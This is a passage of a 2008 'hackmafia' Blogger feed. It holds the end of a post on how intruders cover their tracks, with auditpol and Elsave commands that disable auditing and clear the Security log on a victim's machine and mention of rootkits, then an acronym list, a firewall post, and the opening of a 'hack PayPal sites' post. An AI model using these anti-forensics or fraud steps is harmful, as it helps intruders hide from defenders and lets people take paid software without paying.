kit for administrators. It works well for hackers too, as long as they have administrative access.&lt;br /&gt;Just point it at the victim’s system as follows:&lt;br /&gt;C:\&gt;auditpol \\192.168.10 /disable&lt;br /&gt;Auditing Disabled&lt;br /&gt;&lt;br /&gt;(2) Clear the log file – The attacker will also attempt to clear the log. Tools, such as Winzapper, evidence Eliminator, or Elsave, can be used. Elsave will remove all entries from the logs, except one entry that shows the logs were cleared.&lt;br /&gt;It is used as follows:&lt;br /&gt;&lt;br /&gt;Elsave -s \\192.168.13.10 -1 “Security” -C&lt;br /&gt;&lt;br /&gt;(3) Cover their tracks – One way for attackers to cover their tracks is with rootkits. Rootkits are malicious codes designed to allow an attacker to get expanded access and hide his presence. While rootkits were traditionally a Linux tool, they are now starting to make their way into the Windows environment. Tools, such as NTrootkit and AFX Windows rootkits, are available for Windows systems. If you suspect that a computer has been rootkitted, you need to use an MD5 checksum utility or a program, such as Tripwire, to determine the viability of your programs. The only other alternative is to rebuild the computer from known good media.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-3392584742158525554?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/3392584742158525554/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=3392584742158525554' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3392584742158525554'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3392584742158525554'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/how-hackers-can-erase-their-tracks.html' title='How hackers can erase their tracks after hacking'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-1790251560376847335</id><published>2008-08-26T23:36:00.000-07:00</published><updated>2008-08-26T23:37:20.380-07:00</updated><title type='text'>computer Acronyms</title><content type='html'>&lt;h3 class="post-title entry-title"&gt; &lt;span style="color: rgb(255, 204, 204);"&gt;ADSL - Asymmetric Digital Subscriber Line&lt;/span&gt;&lt;br /&gt;&lt;/h3&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;AGP - Accelerated Graphics Port&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;ALI - Acer Labs, Incorporated&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;ALU - Arithmetic Logic Unit&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;AMD - Advanced Micro Devices&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;APC - American Power Conversion&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;ASCII - American Standard Code for Information Interchange&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;ASIC - Application Specific Integrated Circuit&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;ASPI - Advanced SCSI Programming Interface&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;AT - Advanced Technology&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;ATI - ATI Technologies Inc.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;ATX - Advanced Technology Extended&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- B ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;BFG - BFG Technologies&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;BIOS - Basic Input Output System&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;BNC - Barrel Nut Connector&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- C ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;CAS - Column Address Signal&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;CD - Compact Disk&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;CDR - Compact Disk Recorder&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;CDRW - Compact Disk Re-Writer&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;CD-ROM - Compact Disk - Read Only Memory&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;CFM - Cubic Feet per Minute (ft�/min)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;CMOS - Complementary Metal Oxide Semiconductor&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;CPU - Central Processing Unit&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;CTX - CTX Technology Corporation (Commited to Excellence)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- D ---&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;DDR - Double Data Rate&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;DFI - DFI Inc. (Design for Innovation)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;DIMM - Dual Inline Memory Module&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;DRAM - Dynamic Random Access Memory&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;DPI - Dots Per Inch&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;DSL - See ASDL&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;DVD - Digital Versatile Disc&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;DVD-RAM - Digital Versatile Disk - Random Access Memory&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- E ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;ECC - Error Correction Code&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;ECS - Elitegroup Computer Systems&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;EDO - Extended Data Out&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;EEPROM - Electrically Erasable Programmable Read-Only Memory&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;EPROM - Erasable Programmable Read-Only Memory&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;EVGA - EVGA Corporation&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- F ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;FC-PGA - Flip Chip Pin Grid Array&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;FDC - Floppy Disk Controller&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;FDD - Floppy Disk Drive&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;FPS - Frame Per Second&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;FPU - Floating Point Unit&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;FSAA - Full Screen Anti-Aliasing&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;FS - For Sale&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;FSB - Front Side Bus&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- G ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;GB - Gigabytes&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;GBps - Gigabytes per second or Gigabits per second&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;GDI - Graphical Device Interface&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;GHz - GigaHertz&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- H ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;HDD - Hard Disk Drive&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;HIS - Hightech Information System Limited&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;HP - Hewlett-Packard Development Company&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;HSF - Heatsink-Fan&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- I ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;IBM - International Business Machines Corporation&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;IC - Integrated Circuit&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;IDE - Integrated Drive Electronics&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;IFS- Item for Sale&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;IRQ - Interrupt Request&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;ISA - Industry Standard Architecture&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;ISO - International Standards Organization&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- J ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;JBL - JBL (Jame B. Lansing) Speakers&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;JVC - JVC Company of America&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;- K ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;Kbps - Kilobits Per Second&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;KBps - KiloBytes per second&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- L ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;LG - LG Electronics&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;LAN - Local Are Network&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;LCD - Liquid Crystal Display&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;LDT - Lightning Data Transport&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;LED - Light Emitting Diode&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- M ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;MAC - Media Access Control&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;MB � MotherBoard or Megabyte&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;MBps - Megabytes Per Second&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;Mbps - Megabits Per Second or Megabits Per Second&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;MHz - MegaHertz&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;MIPS - Million Instructions Per Second&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;MMX - Multi-Media Extensions&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;MSI - Micro Star International&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- N ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;NAS - Network Attached Storage&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;NAT - Network Address Translation&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;NEC - NEC Corporation&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;NIC - Network Interface Card&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- O ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;OC - Overclock (Over Clock)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;OCZ - OCZ Technology&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;OEM - Original Equipment Manufacturer&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- P ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;PC - Personal Computer&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;PCB - Printed Circuit Board&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;PCI - Peripheral Component Interconnect&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;PDA - Personal Digital Assistant&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;PCMCIA - Peripheral Component Microchannel Interconnect Architecture&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;PGA - Professional Graphics Array&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;PLD - Programmable Logic Device&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;PM - Private Message / Private Messaging&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;PnP - Plug 'n Play&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;PNY - PNY Technology&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;POST - Power On Self Test&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;PPPoA - Point-to-Point Protocol over ATM&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;PPPoE - Point-to-Point Protocol over Ethernet&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;PQI - PQI Corporation&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;PSU - Power Supply Unit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- R ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;RAID - Redundant Array of Inexpensive Disks&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;RAM - Random Access Memory&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;RAMDAC - Random Access Memory Digital Analog Convertor&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;RDRAM - Rambus Dynamic Random Access Memory&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;ROM - Read Only Memory&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;RPM - Revolutions Per Minute&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- S ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;SASID - Self-scanned Amorphous Silicon Integrated Display&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;SCA - SCSI Configured Automatically&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;SCSI - Small Computer System Interface&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;SDRAM - Synchronous Dynamic Random Access Memory&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;SECC - Single Edge Contact Connector&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;SODIMM - Small Outline Dual Inline Memory Module&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;SPARC - Scalable Processor ArChitecture&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;SOHO - Small Office Home Office&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;SRAM - Static Random Access Memory&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;SSE - Streaming SIMD Extensions&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;SVGA - Super Video Graphics Array&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;S/PDIF - Sony/Philips Digital Interface&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- T ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;TB - Terabytes&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;TBps - Terabytes per second&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;Tbps - Terabits per second&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;TDK - TDK Electronics&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;TEC - Thermoelectric Cooler&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;TPC - TipidPC&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;TWAIN - Technology Without An Important Name&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- U ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;UART - Universal Asynchronous Receiver/Transmitter&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;USB - Universal Serial Bus&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;UTP - Unshieled Twisted Pair&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- V ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;VCD - Video CD&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;VPN - Virtual Private Network&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- W ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;WAN - Wide Area Network&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;WTB - Want to Buy&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;WYSIWYG - What You See Is What You Get&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;--- X ---&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;XGA - Extended Graphics Array&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;XFX - XFX Graphics, a Division of Pine&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;XMS - Extended Memory Specification&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;XT - Extended Technology&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-1790251560376847335?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/1790251560376847335/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=1790251560376847335' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1790251560376847335'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1790251560376847335'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/computer-acronyms.html' title='computer Acronyms'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-2457565288952709268</id><published>2008-08-26T23:29:00.000-07:00</published><updated>2008-08-26T23:34:10.484-07:00</updated><title type='text'>The best firewall is?</title><content type='html'>&lt;span style="color: rgb(255, 204, 204);"&gt;The best firewall is a hardware firewall that is completely separate from your operating system. It need not be a dedicated router, could be an old pentium box running Linux. Below I have found some sites that have How To's on setting up an outside hardware router using an old computer and using a little linux program that fits on a single floppy disk.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;Brief Description:&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;floppyfw is a router with the advanced firewall-capabilities in Linux that fits on one single floppy disc.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;Features:&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;Access lists, IP-masquerading (Network Address Translation), connection tracked packet filtering and (quite) advanced routing. Package for traffic shaping is also available.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;Requires only a 386sx or better with two network interface cards, a 1.44MB floppy drive and 12MByte of RAM ( for less than 12M and no FPU, use the 1.0 series, which will stay maintained. )&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;Very simple packaging system. Is used for editors, PPP, VPN, traffic shaping and whatever comes up. (now this is looking even more like LRP (may it rest in peace) but floppyfw is not a fork.)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;Logging through klogd/syslogd, both local and remote.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;Serial support for console over serial port.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;DHCP server and DNS cache for internal networks.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;floppyfw&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;h#tp://www.zelow.no/floppyfw/&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;Sentry Firewall CD-ROM is a Linux-based bootable CDROM suitable for use as an inexpensive and easy to maintain firewall, server, or IDS(Intrusion Detection System) Node. The system is designed to be immediately configurable for a variety of different operating environments via a configuration file located on a floppy disk, a local hard drive, and/or a network via HTTP(S), FTP, SFTP, or SCP.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;The Sentry Firewall CD is a complete Linux system that runs off of an initial ramdisk, much like a floppy-based system, and a CD. The default kernel is a current 2.4.x series kernel with various Netfilter patches applied. An OpenWall-patched current 2.2.x kernel is also available on the CD.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;Booting from the CDROM is a fairly familiar process. The BIOS execs the bootloader(Syslinux) - which then displays a bootprompt and loads the kernel and ramdisk into memory. Once the kernel is running, the ramdisk is then mounted as root(/). At this point our configuration scripts are run(written in perl) that configure the rest of the system. It is the job of these configure scripts to put the various startup and system files into the proper location using either what is declared in the configuration file(sentry.conf) or the system defaults located in the /etc/default directory.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;Most of the critical files used at boot time can be replaced with your own copy when declared in the configuration file. This is essentially how we allow the user to configure the system using his/her own configuration and init files.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;All of the binaries, files, scripts, etc, used to create the CD-ROM are also available on the CD-ROM. So, with a little practice, you can easily build and customize your own bootable Sentry Firewall CD. Please see the HOWTO for more details.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;Sentry Firewall&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 204, 204);"&gt;ht*p://www.sentryfirewall.com/docs.html#overview&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-2457565288952709268?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/2457565288952709268/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=2457565288952709268' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2457565288952709268'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2457565288952709268'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/best-firewall-is.html' title='The best firewall is?'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-7392220659626743814</id><published>2008-08-26T23:25:00.001-07:00</published><updated>2008-08-26T23:25:45.667-07:00</updated><title type='text'>hack those sites which link with PAYPAL- education purpose only</title><content type='html'>&lt;h3 class="post-title entry-title"&gt; &lt;a href="http://300allpctips.blogspot.com/2008/08/hack-those-sites-which-link-with-paypal.html"&gt;&lt;br /&gt;&lt;/a&gt; &lt;/h3&gt;   &lt;h3 style="color: rgb(255, 204, 204);" class="post-title"&gt; &lt;/h3&gt;  &lt;div style="color: rgb(255, 204, 204);" class="post-body"&gt; &lt;p&gt;How to hack &lt;a name="0596007515" id="amzn_cl_link_0" target="_blank" href="http://amazon.com/gp/product/0596007515?ie=UTF8&amp;amp;tag=bestwindowstr-20&amp;amp;link_code=em1&amp;amp;camp=212341&amp;amp;creative=384049&amp;amp;creativeASIN=0596007515&amp;amp;adid=0d79ed73-5440-4948-9f16-03f9e46d6f42"&gt;&lt;/a&gt;paypal sites or how to download applications free from PayPal sites....U just&lt;br /&gt;need to know a bit of HTML anyone want to download any application from da sites which r containing PayPal order page &amp;amp; a link to start...&lt;br /&gt;&lt;br /&gt;First off all u need to hide ur ip-address use a proxy server otherwise ur ip address will be recorded in some sites click here to hide ur ip-address.&lt;br /&gt;&lt;br /&gt;1) Rightclick your mouse (ctrl+click) view source and open the source &lt;a name="B0001A2228" id="amzn_cl_link_1" target="_blank" 